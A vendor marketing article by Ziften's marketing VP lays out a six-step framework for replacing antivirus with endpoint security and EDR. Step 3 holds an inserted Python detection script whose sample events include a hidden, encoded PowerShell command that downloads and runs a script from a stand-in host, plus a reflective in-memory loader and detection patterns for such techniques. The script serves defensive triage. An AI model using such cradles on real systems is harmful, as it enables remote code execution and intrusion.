Written by Roark Pollock, vice president of marketing for Ziften Technologies.
If you're in the market to replace or upgrade your existing anti-virus (AV) solution and plan to spend ample time researching the differing enterprise endpoint security software on offer, you might begin to envy "cat herders": herding cats looks easy compared to clearly understanding endpoint security these days. There are oceans of information, much of it misleading and downright confusing, so it is hard to know where to start. The industry is also full of jargon that is used inconsistently.
A successful process needs a simpler framework. The key steps are outlined here:
- Step 1: Answer the Question: What is Wrong with Your Current AV Solution?
- Step 2: Define your Operational Requirements.
- Step 3: Focus on the Most Important Protection Capabilities.
- Step 4: Get Built-in Endpoint Detection and Response (EDR).
- Step 5: Find Out What More Can I Get?
- Step 6: Bonus Pro Tip
Most posted marketing content tries to get the reader to jump right to the answer (i.e. buy the vendor's product). But let's start this exercise differently...
Step 1: Answer the Question: What is Wrong with Your Current AV Solution?
Before researching new endpoint security solutions to replace your current AV or next-generation AV (NGAV), start by documenting what's not working today. Consider this the most important step in this framework.
Do the following:
- Write down what's not working - get your priorities on paper.
- Quantify it if possible - for each item you've written down, try to quantify the scale of the miss. This builds a baseline against which to measure success at the end of the purchasing process.
- Socialize it and get agreement - this is usually the most surprising part of the exercise. Review your issue list with as many IT and security team members as possible, anyone who touches those endpoints, be they workstations, laptops, servers, or virtual machines. The goal is broad consensus.
- Document the future state you want to achieve - finally, once you have agreement on the current state and what's not working, write down the future state you want to reach. This does not have to be perfect, but it will serve as a guide through the next several steps in this framework.
To get you started, below are some examples of issues within organizations (the ones we most often hear when speaking to customers).
- Our AV product simply fails to stop many threats / attacks.
- AV causes too many laptop performance issues for users.
- We have little to no visibility or data on what's actually happening on the endpoint.
- End user productivity is reduced because users have to hand their laptops to IT for analysis and remediation.
- It takes us way too long to investigate and respond to endpoint alerts.
- We have too many endpoint tools in addition to AV; AV is not the only issue.
- Our AV product costs too much.
This is not an exhaustive list, but simply something to get you thinking. Often the problem is more widespread than you first assume.
Step 2: Define your Operational Requirements.
This step is usually much easier for technical teams than the first. Define your operational environment and the requirements you will have for the solutions you review. This involves answering the following questions:
- Do you have an inventory of the endpoints on your network that need protection? If so, what device types are you trying to protect? This might include laptops, desktops, workstations, tablets, smartphones, servers, virtual machines, virtual desktop infrastructure, etc.
- What operating systems are running on those devices? Windows, Windows Server, macOS, Linux distributions such as Red Hat, Ubuntu, CentOS, Fedora, and Scientific Linux, iOS, Android, etc. List the versions of each operating system as well, especially if you have really old versions, since agent support for those is often the first thing a vendor cannot promise.
- Do you want a cloud-delivered endpoint security solution, or will you require an on-premises deployment of the backend architecture?
- Will you deploy only on company-owned endpoints, or does this include employee-owned endpoints?
- Who will ultimately be using the endpoint security solution you put into place? This could be a single person or many different teams, such as security operations (SecOps), IT operations (IT Ops), helpdesk / end user support, server support, development operations (DevOps), and even governance, risk management and compliance (GRC).
- What systems integrations would you like to set up? These often include malware analysis / sandboxing solutions, security information and event management (SIEM) systems, ticketing or orchestration systems, vulnerability assessment and patch management systems, and other data analysis tools.
Step 3: Focus on the Most Important Protection Capabilities.
Traditional or legacy enterprise antivirus solutions are all about threat prevention, and all NGAV and endpoint security software solutions deliver this same function. The key is knowing where to focus your efforts when evaluating the efficacy of these solutions. Here I divide endpoint threats into three categories:
- Known, file-based malware
- Unknown or zero-day, file-based malware
- So-called file-less attacks
The first category, known malware, is largely a solved problem for all traditional AV and NGAV products, whether based on signatures, heuristics, behavioral analysis, or machine learning. This is not to say there are no differences in efficacy, but think of these attacks as "background radiation": every endpoint protection tool on the market should do a good job against them. More importantly, these threats are becoming less of a factor in successful attacks precisely because most AV tools do work well against them. So do not focus your efficacy evaluations on this category of protection; take it for granted.
The key area to focus on is protection against the other two categories of threats, zero-day malware and file-less attacks.
For years now, successful malware attacks on enterprises have predominantly been single-use or have employed polymorphic techniques. As far back as 2015, Webroot's Threat Brief found that up to 97% of successful enterprise malware infections were single-use or polymorphic. Protection against these zero-day malware threats is therefore a huge area to focus on in your evaluations.
Unfortunately, even stopping zero-day malware isn't enough these days. When evaluating endpoint security solution efficacy, our third category of attacks is another area we need to investigate. This category of file-less attacks primarily consists of:
- Phishing and spear-phishing attacks via Office documents
- Weaponized PDF attacks
- Direct-to-memory PowerShell attacks
Why? Symantec's 2019 Internet Security Threat Report found that 48% of malicious email attachments are Microsoft Office files, up from 5% in 2017. And IBM X-Force research in 2018 found that 57% of successful attacks leverage direct-to-memory PowerShell techniques.
So, while protection against known malware is nice, it is no longer enough, nor an important differentiator when evaluating an AV replacement. Focus on protection efficacy against unknown, zero-day malware and against file-less attacks like weaponized documents and in-memory attacks.
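As an added illustration, not part of the original article and not any vendor's product code, the following Python sketch shows the kind of telemetry an endpoint agent has to capture and decode before it can catch the third category above. It triages a handful of constructed records loosely modelled on Windows Security event 4688 (process creation command line) and PowerShell/Operational event 4104 (script block text), decodes an -EncodedCommand payload from its Base64/UTF-16LE form, and flags download cradles, reflective .NET loading, evasion switches, and Office applications spawning a script host. The sample events, indicator patterns, and the "suspicious" threshold are all assumptions chosen for the example.

```python
import base64
import re
from typing import Dict, List, Optional, Tuple


def _encode_ps(command: str) -> str:
    """Build a PowerShell -EncodedCommand argument: Base64 of the UTF-16LE command."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


# Constructed sample telemetry, not captured data. Each record is
# (event_id, parent_process, text), loosely modelled on a 4688 process-creation
# command line or a 4104 script-block text record.
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"
SAMPLE_EVENTS: List[Tuple[int, str, str]] = [
    # Weaponized Office document launching a hidden, encoded download cradle.
    (4688, "WINWORD.EXE",
     "powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Enc " + _encode_ps(CRADLE)),
    # Script block that reflectively loads a .NET assembly straight from memory.
    (4104, "powershell.exe",
     "$b=[Convert]::FromBase64String($x);"
     "[System.Reflection.Assembly]::Load($b).EntryPoint.Invoke($null,$null)"),
    # Benign administrative script block.
    (4104, "powershell.exe", r"Get-ChildItem C:\Users -Recurse | Measure-Object"),
    # Scheduled backup: one evasion-looking flag, nothing else.
    (4688, "explorer.exe", r"powershell.exe -NoProfile -File C:\scripts\backup.ps1"),
]

# Heuristic indicators of in-memory execution (assumed patterns). Nothing here
# touches disk, so a file-scanning engine never gets a sample to inspect.
INDICATORS: Dict[str, re.Pattern] = {
    "download_cradle": re.compile(
        r"(DownloadString|DownloadData|Invoke-WebRequest|\bIWR\b|Net\.WebClient)", re.I),
    "in_memory_exec": re.compile(
        r"(\bIEX\b|Invoke-Expression|\[System\.Reflection\.Assembly\]::Load)", re.I),
    "evasion_flags": re.compile(
        r"(-W(indowStyle)?\s+Hidden|-NoP(rofile)?\b|-Exec(utionPolicy)?\s+Bypass|-NonI(nteractive)?\b)",
        re.I),
    "encoded_command": re.compile(
        r"-(e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})", re.I),
}
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "acrord32.exe"}
SCRIPT_HOSTS = re.compile(r"(powershell|pwsh|cmd\.exe|wscript|cscript|mshta)", re.I)


def decode_encoded_command(text: str) -> Optional[str]:
    """Return the plaintext of an -EncodedCommand payload, or None if absent or invalid."""
    match = INDICATORS["encoded_command"].search(text)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(2), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_event(event_id: int, parent: str, text: str) -> Dict[str, object]:
    """Decode, match indicators against raw plus decoded text, and give a verdict."""
    decoded = decode_encoded_command(text)
    haystack = text if decoded is None else text + "\n" + decoded
    hits = [name for name, rx in INDICATORS.items() if rx.search(haystack)]
    if parent.lower() in OFFICE_PARENTS and SCRIPT_HOSTS.search(text):
        hits.append("office_parent")
    hits.sort()
    # One evasion flag alone is admin noise; an in-memory execution primitive,
    # an Office app spawning a script host, or two independent indicators is
    # enough to open an investigation.
    suspicious = (len(hits) >= 2
                  or "in_memory_exec" in hits
                  or "office_parent" in hits)
    return {"event_id": event_id, "parent": parent, "decoded": decoded,
            "hits": hits, "suspicious": suspicious}


def triage(events: List[Tuple[int, str, str]]) -> List[Dict[str, object]]:
    """Run analyze_event over a batch of (event_id, parent, text) records."""
    return [analyze_event(eid, parent, text) for eid, parent, text in events]


if __name__ == "__main__":
    for result in triage(SAMPLE_EVENTS):
        flag = "SUSPICIOUS" if result["suspicious"] else "ok"
        print(f"{result['event_id']} {result['parent']:<16} {flag:<10} {result['hits']}")
```

The point for an evaluation: a product that only inspects files on disk never sees the decoded cradle or the reflectively loaded assembly at all. When you test the file-less category, ask the vendor how the agent records script block content and parent/child process relationships, because that is the raw material both for blocking and for the retention question in Step 4.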
Step 4: Get Built-in Endpoint Detection and Response (EDR).
Cybersecurity professionals have all moved beyond the idea that threat protection can be fully automated and 100% effective. That's why so much attention is paid to detection and response capabilities in today's endpoint security discussions.
The basic premise behind EDR is to find those threats, whether external or internal, that have bypassed our protection efforts and are now resident inside the enterprise. Once a threat is found, it is critically important to analyze the kill chain to determine the full scope of the attack, going back in time to the root cause of the successful intrusion, and then to apply that knowledge to quarantine and eliminate the threat.
When you first start looking at EDR there are a few key questions you'll want to ask internally.
- Is it a nice to have? Are you getting EDR as a "nice to have", or do you fully intend to implement regular threat hunting and response?
- What level of time commitment and expertise is required? Will you conduct threat hunting and response internally, or will you outsource the function?
- What level of visibility does the solution provide? Given that the average dwell time of threats in the enterprise is typically measured in months, does the EDR solution retain collected endpoint visibility data long enough to let you ferret out the original intrusion point? Or is that data deleted to save storage costs before you need it? This is an important point, and a simple one to answer for any solution: ask for the retention period in days and compare it against the dwell time you expect to have to investigate.
- What response and remediation actions are available? Do they fit your needs and solve the original issues from Step 1? Does the solution allow response on remote endpoints? Is a workflow available for investigation and response?
- Do you want to automate response actions? If so, what is available for your future use?
Typically, the most important thing EDR solutions provide is granular endpoint visibility, which can be immensely useful to a variety of teams within the organization, and for a variety of purposes.
Step 5: Find Out What More Can I Get?
Good endpoint security starts well before any AV or endpoint protection tool inspects a file to determine whether it is a threat. It starts with maintaining good endpoint hygiene in order to keep the attack surface as small as possible. These endpoint hardening practices are by far the most effective threat prevention available.
And since leading endpoint security software solutions now provide rich endpoint visibility, some are starting to incorporate these functions as well.
If you want to get more from your endpoint protection platform, look for functionality that includes items like:
- Endpoint discovery and inventory. Many endpoint protection platforms can now comprehensively discover, fingerprint, and inventory all connected devices, even infrequently connected ones. This helps to find and possibly eliminate rogue devices.
- Application discovery and inventory. This can include detailed cataloging of the applications installed on each and every managed endpoint. It can also be used to discover the use of unauthorized applications by insiders.
- Endpoint vulnerability discovery and prioritization. Given that security agents on the endpoint monitor the OS and applications in real time, they may provide detailed vulnerability tracking with no additional agent, external scanning, or scheduling required.
- Configuration hardening and compliance. These endpoint security agents may also be able to continuously monitor the endpoint security controls in place and report on, or remediate, endpoints that are non-compliant with your security policies.
At the end of the day, endpoint visibility is valuable across the entire organization, not just to the security team.
Step 6: Bonus Pro Tip
Depending on the uses of whatever endpoint protection platform you evaluate and eventually select, look at the return on investment (ROI) you might be able to justify. Demonstrating a positive ROI will surely help you justify an upgrade from your existing AV solution. So how might you demonstrate ROI from an endpoint security tool? Look for the following:
- Can you replace multiple existing endpoint products with your new endpoint protection platform? Certainly it will replace your AV tool, but do you also have an NGAV tool it will replace? What about an existing standalone EDR tool? Or an incident response solution? Or a vulnerability scanner? Get creative and see if you can make it pay for itself.
- Additionally, use the application inventory to save money on over-provisioned Adobe and Microsoft Office licenses that may not be getting used. Anything you can do here might help you get a new endpoint security software solution for next to nothing. Heck, if you're lucky you might even save money.
If you want to read more about replacing your anti-virus solution with Ziften, check out some of our additional resources at
https://ziften.com/replace-your-anti-virus/
About the Author
Roark Pollock is vice president of marketing for Ziften Technologies. He is a marketing leader with over 20 years of experience in early-stage and global IT, networking and security companies. He is a frequent company spokesperson and evangelist for industry events, print, online, and social media.